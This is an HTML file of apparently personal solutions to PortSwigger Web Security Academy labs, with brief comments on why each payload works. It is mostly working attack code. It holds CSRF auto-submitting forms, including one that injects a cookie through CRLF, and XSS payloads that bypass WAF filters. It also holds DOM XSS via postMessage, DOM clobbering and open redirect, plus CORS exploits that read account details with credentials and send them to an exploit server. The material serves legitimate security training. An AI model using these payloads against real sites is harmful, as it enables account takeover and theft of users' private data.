

<!-- port swigger -->

<!-- Answer for cross site request forgery (csrf) 1  -->
<html>
	<body>
		<form method="POST" action="https://0a48004004dbf094808a5320001500c1.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hacked@wajjawd.net"/>
		</form>
           <script>
            document.forms[0].submit();
        </script>
	</body>
<html>


<!-- Answer for cross site request forgery (csrf) 2 -->
<!-- Note here, The exploitable method was GET in this case as done in the following, Even if providing ?email=anything will change the email from the input value-->

<html>
	<body>
		<form method="GET" action="https://0a13001003aa33a481e4ca0200f6001c.web-security-academy.net/my-account/change-email?email=pwend@normal-user.net">
			<input type="hidden" name="email" value="hackedbruh@evil-user.net"/>
                 </form>
        <script>
            document.forms[0].submit();
        </script>
	</body>
<html>




<!-- Answer for cross site request forgery (csrf) 3 -->
<!-- Note here, The exploitable request was that the server didn't check if the csrf was present in the email change functionalty -->

<html>
	<body>
		<form method="POST" action="https://0a0a00aa04ea0c2d81638975007f0003.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hackedma3lnormal-user.net1"/>
		</form>
        <script>
            document.forms[0].submit();
        </script>
	</body>
<html>





<!-- Answer for cross site request forgery (csrf) 4 -->
<!-- Note here, The exploitable request was that the server didn't check if the csrf code was connected to the same cookie of the that user  -->


<html>
	<body>
		<form method="POST" action="https://0ade009903ae0bf880e5ee6c005a002f.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hackedmail@normal-user.net"/>
			<input type="hidden" name="csrf" value="TJ1kSvmDxsfTeOk5CVL3cu0xSLk0VzIi"/>
		</form>
<script>
            document.forms[0].submit();
        </script>
	</body>
<html>




<!-- Answer for cross site request forgery (csrf) 4 -->
<!-- Note here, The exploitable request was that the server didn't check if the cookie csrf and csrf code was connected of the that user, As long the csrf cookie was valid and the csrf code was of that csrf cookie you could make requests  -->
<!-- regardless of that users csrf cookie and csrf code -->


<html>
	<body>
		<form method="POST" action="https://0a88006803fe31938005992100bc00d4.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hackedmail@normal-user.net"/>
			<input type="hidden" name="csrf" value="FuM19MpMeeFgpVKWhXQJfLHwUQbP0iSF"/>
		</form>
	<img src="https://0a88006803fe31938005992100bc00d4.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=j7dbZTn0PgVaqlLBMjUHxQw7vNO1Vz7d%3b%20SameSite=None" onerror="document.forms[0].submit()">
	</body>
<html>








<!-- answer for waf in cross site scripting -->

<iframe src="https://0ace0018034813d583f50568008b004c.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.height='100px' >


<!-- answer for waf in corss site scripting 2-->

<script>
    location='https://0ad8003f040908b480fb587b00c200dc.web-security-academy.net/?search=%3Cfoo+onfocus%3D%22alert%28document.cookie%29%22+id%3D%22x%22+tabindex%3D%221%22%2F%3E#x'
</script>


<!-- answer for waf in corss site scripting 3-->

<!-- Note when iframe is not allowed the best second thing to try is location (redrecting the the url address)-->

<script>
    location='https://0a0c005d03b532138c07d0ce0099000b.web-security-academy.net/?search=%3Cfoo+onfocus%3D%22alert%28document.cookie%29%22+id%3D%22x%22+tabindex%3D%221%22%2F%3E#x'
</script>


















<!-- answer for dom corss site scripting 2 -->

<!-- this worked because the script in the lab takes the url input of window.postMessage as a string and then searchs for two keywords http: or https: in that string -->

<!-- After a it finds the keyword (http: or https:) it then procced to assign the input string as url. there for doing window.postMessage(javascript:print()//http:','*')-->

<!-- Will work because it executes the javascript in function in that url  -->

<iframe src="https://0a50003603b323d68389653d000b0091.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">





<!-- answer for dom cross site scripting 3 -->

<!-- Same idea but the differece is now, Is the lab takes the input and if the keywords http: or https: present it will redirect to that string as a url page -->

<iframe src="https://0a0b00d9046c4736c4e8fe4e002600cd.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')"></iframe>



<!-- Answer for dom cross site scripting 4 -->
 
<!-- In this lab it reads the json and from there construcrts the iframe acorrding the the switch case in the script in the website -->

<iframe src="https://0a52001104dc710c83b4e75400fe007d.web-security-academy.net" 
        onload="this.contentWindow.postMessage(JSON.stringify({type:'load-channel',url:'javascript:print()'}), '*')">
</iframe>



<!-- Answer for dom cross site scripting 5 -->

<!-- In this lab there is a script that uses regex to check if the paramter url= has http or https before :// and  if so it checks if there is any characters after it -->

<!-- for example: https://regular-website/?url=https://attacker-website.com - this will be placed as the url to be redirected from the regular website to the attack website -->

<!--Note this attack is called open redirect -->


https://0ac7006003fa0cc383e51a080096003f.web-security-academy.net/post?postId=6&url=https://put-your-exploit-server-here






<!-- Answer for dom cross site scripting 6 -->

<!-- In this lab there is a script that writes visited post to the cookie of the website, To exploit this we need to get out of the url <a> tag and then write XSS as shown -->

<!--After pressing enter in the url bar this value is stored in the cookie and the print() runs. -->

<!-- In the iframe the onload is used to redirect the user browser AFTER the XSS has ran on the user browser without him knowing he gets redirected to the main page -->

<!-- The if(window.x - value not set) then set value to this.src=url after that window.x=1 - end the redirection (Prevent inifite loop of redirections)-->

<iframe src="https://0a8400c50480130880ba718300230066.web-security-academy.net/product?productId=1&'><script>print()</script>" 
onload="if(!window.x)this.src='https://0a8400c50480130880ba718300230066.web-security-academy.net';window.x=1;"></iframe>




<!-- Answer for dom cross site scripting 7 -->

<!--In this lab you need to exploit a variable that creates html elements (src for img) using cid allows to inject onerror since the src will lead to that -->

<!-- IMPORTANT reading the code and understanding it is very curical for finding exploits -->

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:hello&quot;onerror=&quot;alert()"></a>


<!-- Answer for dom cross site scripting 8 -->

<!--In this lab same kind of idea from lab 7 but now there is a libary that uses the attribautes (Js dom element) so putting for example -->

<!-- <form onclick="alert(1)" id="XSS"/><input id=attribautes/> - the code will ignore the unallowed attriabutes such onclick and its value. Because of the usage of attribautes -->

<!-- Because it will get attriabutes- so it will ignore the rest of the unallowed things (failer in the loop checker because of using this attriabutes in properly)  -->

<!-- IMPORTANT reading the code and understanding it is very curical for finding exploits -->

<iframe src="https://0af800bd0411b14f83f1cefd00d8008e.web-security-academy.net/post?postId=6" onload="setTimeout(()=>this.src=this.src+'#X',500)"></iframe>















<!-- answer for the same cors origin 1-->

<script>

var req = new XMLHttpRequest();

req.onload = reqListener;

req.open('get','https://0a0b00d9046c4736c4e8fe4e002600cd.web-security-academy.net/accountDetails',true);

req.withCredentials = true;

req.send();

function reqListener() {

	location='/log?key='+this.responseText;

};

</script>







<!-- answer for the same cors origin 2, Note here we are using sandbox to make a request as a null website, To get admins data we need to write allow-scripts -->

<!-- srcdoc is where you can store html,css and javascript elements-->

<iframe sandbox="allow-scripts" srcdoc="<script>
    var req = new XMLHttpRequest();

    req.onload = reqListener;

    req.open('get','https://0a0b00d9046c4736c4e8fe4e002600cd.web-security-academy.net/accountDetails',true);

    req.withCredentials = true;

    req.send();

    function reqListener() {

        location='https://https://exploit-0abe00480465b4f98575d9c901ca0051.exploit-server.net/log?key='+this.responseText;

    };
    </script>"></iframe>





<!-- answer for the same cors origin 3, Note that searching the website we can find a address that the website accpets data from, Then trying to see if that website is effected by XSS.  -->

<!-- After all that in the place where XSS is effected we construct the XMLHttpRequest. -->

<script>
    document.location="http://stock.0ac1005504d8b4e1859bdaa500d600fc.web-security-academy.net/?productId=<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ac1005504d8b4e1859bdaa500d600fc.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0abe00480465b4f98575d9c901ca0051.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>





